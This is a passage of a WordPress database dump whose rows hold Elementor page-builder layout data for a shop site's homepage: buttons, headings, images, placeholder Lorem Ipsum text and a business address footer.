\",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(7909,1407,'_elementor_page_assets','a:0:{}'),(7911,1408,'_elementor_edit_mode','builder'),(7912,1408,'_elementor_template_type','wp-page'),(7913,1408,'_elementor_version','3.7.6'),(7914,1408,'_wp_page_template','elementor_canvas'),(7915,1408,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\"},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7916,1408,'_elementor_page_assets','a:0:{}'),(7928,1410,'_elementor_edit_mode','builder'),(7929,1410,'_elementor_template_type','wp-page'),(7930,1410,'_elementor_version','3.7.6'),(7931,1410,'_wp_page_template','elementor_canvas'),(7932,1410,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 